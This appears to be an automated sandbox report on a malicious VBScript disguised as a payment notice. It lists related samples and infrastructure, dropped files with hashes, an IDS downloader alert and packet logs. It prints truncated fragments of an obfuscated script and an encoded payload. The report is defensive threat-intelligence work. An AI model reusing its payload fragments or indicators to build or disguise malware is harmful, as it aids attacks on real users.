                                                      RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • ip-api.com/json/?fields=status,country,regionName,city,query
                                                      aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                      • api.ipify.org/
                                                      perfcc.elfGet hashmaliciousXmrigBrowse
                                                      • api.ipify.org/
                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                      • api.ipify.org/
                                                      SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                      • api.ipify.org/
                                                      hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                      • api.ipify.org/
                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                      • api.ipify.org/
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comCircular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                      • 208.95.112.1
                                                      api.ipify.orgUrgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      https://freshremovedigital.com/Get hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      https://merzcon-my.sharepoint.com/:f:/g/personal/cnico_merzcon_onmicrosoft_com/EmjHG5K9dP9BtgBBeTTFhjABJRRLGM6IhVrJlwBTMWY8rg?e=pfkS1fGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      Play_VM.Now.matt.sibilo_Audio.wav...v.htmlGet hashmaliciousHtmlDropperBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.MalwareX-gen.24889.8387.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      https://netorg11230081-my.sharepoint.com/:f:/g/personal/info_onafastpacecontracting_com/Eoa77Lo8BXlOut3qDNQUDAQBBgmgCvIALxhAXrlqjk9Asw?e=2UKAY6Get hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      PO #89230.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      https://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.12.205
                                                      Purchase Order For Linear Actuator.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Play_VoiceMsg_mchee@eq3.com_{RANDOM_NUMBER5}CQDM.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                      • 104.26.13.205

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSPO-008847332.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                      • 104.21.53.112
                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                      • 104.21.53.8
                                                      Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      #PO247762.docxGet hashmaliciousRemcosBrowse
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousLummaC, StealcBrowse
                                                      • 172.67.206.204
                                                      Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                      • 172.67.206.204
                                                      VY871GcABT.exeGet hashmaliciousDCRatBrowse
                                                      • 188.114.96.3
                                                      01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                      • 188.114.97.3
                                                      TMVADS-APTM-VADSDCHostingMYK0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                      • 112.137.173.77
                                                      XjPA2pnUhC.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 112.137.173.77
                                                      Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                                      • 112.137.173.77
                                                      EORJy4JxW2.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                      • 112.137.173.77
                                                      ZPujMIT7Vs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                      • 112.137.173.77
                                                      arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 202.75.62.110
                                                      SecuriteInfo.com.Trojan.AutoIt.1161.27360.18045.exeGet hashmaliciousVIP KeyloggerBrowse
                                                      • 202.75.41.110
                                                      M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                                                      • 202.75.62.171
                                                      fhSHwOyb33.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 202.75.62.139
                                                      sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 202.75.62.119
                                                      TUT-ASUSCircular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 208.95.112.1
                                                      aoKTzGQSRP.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                      • 208.95.112.1

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0escan_doc20241024.vbsGet hashmaliciousRemcosBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      FedEx Shipping Document_pdf.htmlGet hashmaliciousUnknownBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Douglas County Government.pdfGet hashmaliciousHtmlDropperBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      https://t.ly/2jKWOGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Play_VM.Now.matt.sibilo_Audio.wav...v.htmlGet hashmaliciousHtmlDropperBrowse
                                                      • 104.26.12.205
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      37f463bf4616ecd445d4a1937da06e19RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Monetary_002993034958293.jsGet hashmaliciousUnknownBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65
                                                      UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                      • 142.250.185.238
                                                      • 142.250.186.65

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.8908305915084105
                                                      Encrypted:false
                                                      SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                      MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                      SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                      SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                      SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3413510p.ljv.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qw3cchv.c5h.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erbvguls.juw.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5absdi2.yhe.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Mejeriernes.Pra

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):482352
                                                      Entropy (8bit):5.960666287766245
                                                      Encrypted:false
                                                      SSDEEP:6144:tH2jKpHYwqmGtU9p69NUXVzmgNkWX1sqCDmi7tKB05QyAaDs:F2mQtUbcNUXVSg2WlsqYmi7tKUbBY
                                                      MD5:D5A813E95AF204EB21E5E64D03B7E94F
                                                      SHA1:91B7D3FDC1FF2A28D97A6E68961A3870B33D377A
                                                      SHA-256:A2F40C0B9D4777F1E2E47E94B31F90B9568B5581C6330101D04563462629B483
                                                      SHA-512:E0252C9C0CFA754129F2C8F76B52A9AADC769F7722A115FA069881C71986522824D2D3A3C19666F98FBCCB0ADF434CB504C545B6460C2EBF274C957752A00AEC
                                                      Malicious:false
                                                      Preview:cQGbcQGbu9pQGQDrAmjHcQGbA1wkBHEBm3EBm7memDgG6wJPvnEBm4HxpyrrUnEBm+sCAgeB6Tmy01RxAZvrAvOAcQGbcQGbuv8fZnbrApiVcQGb6wIlqusC4hsxyusCeuZxAZuJFAtxAZvrAlog0eJxAZtxAZuDwQRxAZvrArcbgfnmkUMEfMvrAjHR6wLdhotEJATrAovTcQGbicPrAnlt6wIycIHD4v97A3EBm+sCIha6t9aWTOsCF6xxAZuB8p78F8PrAsUzcQGbgeopKoGPcQGb6wLokHEBm3EBm3EBm3EBm4sMEHEBm3EBm4kME3EBm+sCU4xCcQGbcQGbgfoECgUAddjrAtl9cQGbiVwkDOsC8a3rAt+Gge0AAwAA6wIaV+sC1q2LVCQIcQGbcQGbi3wkBHEBm+sCefeJ6+sCvpxxAZuBw5wAAABxAZvrAllGU3EBm3EBm2pA6wIKnnEBm4nr6wKaWHEBm8eDAAEAAADwXwTrApClcQGbgcMAAQAA6wIx8OsCt05T6wLNDHEBm4nrcQGbcQGbibsEAQAA6wJBsnEBm4HDBAEAAHEBm3EBm1NxAZvrAo28av/rAlhh6wJa8oPCBXEBm+sCtL4x9usCBd/rAqsmMclxAZvrAriUixpxAZtxAZtBcQGbcQGbORwKdfTrAubN6wJXBkZxAZvrAhEogHwK+7h13XEBm3EBm4tECvxxAZtxAZsp8OsCQo1xAZv/0usCrl9xAZu6BAoFAOsCo+9xAZsxwHEBm3EBm4t8JAxxAZvrAutggTQHJ3n2G+sCPDzrAi+bg8AEcQGb6wIR9DnQdeNxAZtxAZuJ+3EBm3EBm//XcQGbcQGbH54eGyd59kCjo5Ai5vAT3GLQfZG/jHdujja3U3H4g7ILN0/GpjxfA1rvd1fYNF9u3Sxy2a6cT1VUe/Pt4LV36tLkwCmmiLIfovR36sCTR6FBQDQjy76yFiff4NeyQD1NmUz2Gyf4COmOG8kU

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):4.849790020693063
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:OUTSTANDING PAYMENT STATUS 01199241024.vbs
                                                      File size:551'642 bytes
                                                      MD5:7fa14a09427be7ceba827276d7fd75dc
                                                      SHA1:db51a4f0c0fd11413e428ef3af6669d28d4c924d
                                                      SHA256:e1be3817c6710586dfbbab1ccd925975da7d0d1d41cf6cdd5fe6e8e29063b40c
                                                      SHA512:1569d2bab84c5cdb56d51b2da01582a6fe67eb4c17293c285012e23a804cf7c944ac5e69e3b04b357a961d3dfefc213ec9ebbe9f3bdf1fc882b23d692e45841c
                                                      SSDEEP:6144:MZ/7iXTm2Xrdfgb0Etq0lAavcOH1WfMPac0N5mShWv2f8oCzsu7dhfwO0NnHV4GH:lnbdY3BDHsfO0rxhmSunwOm+Gc/Rg
                                                      TLSH:FAC44A71FA64051A0D5E37A9FC585A86C5BCD204052B20EDBEE8038DD11E8EDF3FDA69
                                                      File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla

                                                      File Icon

                                                      Icon Hash:68d69b8f86ab9a86

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-24T08:46:58.617838+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549875142.250.185.238443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 08:46:11.460786104 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:11.460839033 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:11.460921049 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:11.468417883 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:11.468441963 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.334377050 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.334471941 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.335926056 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.335985899 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.340441942 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.340460062 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.340867043 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.353899002 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.395339012 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.728771925 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.728943110 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.732754946 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:12.732801914 CEST44349704142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:12.732877016 CEST49704443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:16.891071081 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:16.891124964 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:16.891227961 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:16.891535997 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:16.891551971 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:17.892996073 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:17.893110991 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:17.895345926 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:17.895409107 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:17.933367014 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:17.933408976 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:17.934380054 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:17.945231915 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:17.991337061 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:18.300940990 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:18.355566025 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:18.355601072 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:18.356262922 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:18.356384039 CEST44349705142.250.185.238192.168.2.5
                                                      Oct 24, 2024 08:46:18.356448889 CEST49705443192.168.2.5142.250.185.238
                                                      Oct 24, 2024 08:46:18.357589006 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:18.357614040 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:18.358628035 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:18.358628035 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:18.358663082 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:19.220099926 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:19.220388889 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:19.223822117 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:19.223834038 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:19.224123955 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:19.224982023 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:19.271374941 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.298176050 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.298273087 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.306566000 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.306667089 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.415972948 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.416058064 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.416138887 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.416161060 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.416217089 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.417480946 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.417545080 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.417556047 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.421807051 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.421888113 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.421895981 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.430550098 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.430633068 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.430648088 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.439295053 CEST44349706142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:46:22.439526081 CEST49706443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:46:22.439536095 CEST44349706142.250.186.65192.168.2.5
